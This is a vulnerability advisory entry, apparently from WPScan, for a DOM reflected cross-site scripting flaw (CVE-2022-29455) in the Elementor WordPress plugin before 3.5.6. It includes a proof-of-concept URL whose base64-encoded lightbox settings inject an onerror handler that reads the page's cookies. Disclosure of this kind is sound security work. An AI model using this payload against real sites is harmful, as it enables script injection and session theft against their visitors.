Elementor < 3.5.6 – DOM Reflected Cross-Site Scripting | CVE 2022-29455 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape user input appended to the DOM via malicious Lightbox settings, resulting in a DOM Cross-Site Scripting issue

Proof of Concept

https://example.com/#elementor-action:action=lightbox&settings=ewogICAgInR5cGUiOiAidmlkZW8iLAogICAgInVybCI6ICJodHRwOi8vIiwKICAgICJ2aWRlb1R5cGUiOiAiaG9zdGVkIiwKICAgICJ2aWRlb1BhcmFtcyI6IHsKICAgICAgICAib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbisnICcrZG9jdW1lbnQuY29va2llKSIsCiAgICAgICAgInN0eWxlIjogImJhY2tncm91bmQtY29sb3I6cmVkIgogICAgfQp9

Affects Plugins

Fixed in 3.5.6

References

CVE

URL

https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Rotem Bar

Verified

Yes

WPVDB ID

9758570b-4729-4eef-ad52-b6e922f536d6

Timeline

Publicly Published

2022-06-13 (about 3 years ago)

Added

2022-06-13 (about 3 years ago)

Last Updated

2023-03-15 (about 2 years ago)

Other

Published

Title

Published

2025-12-31

Title

Locatoraid Store Locator <= 3.9.65 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2014-07-02

Title

Dmca Watermarker < 1.1 - XSS

Published

2024-03-13

Title

APIExperts Square for WooCommerce < 4.3 - Reflected Cross-Site Scripting

Published

2025-04-21

Title

LightPress Lightbox < 2.3.4 - Contributor+ Stored XSS

Published

2024-11-22

Title

Wishlist for WooCommerce: Multi Wishlists Per Customer PRO 3.0.8 - 3.1.2 - Reflected Cross-Site Scripting via wtab Parameter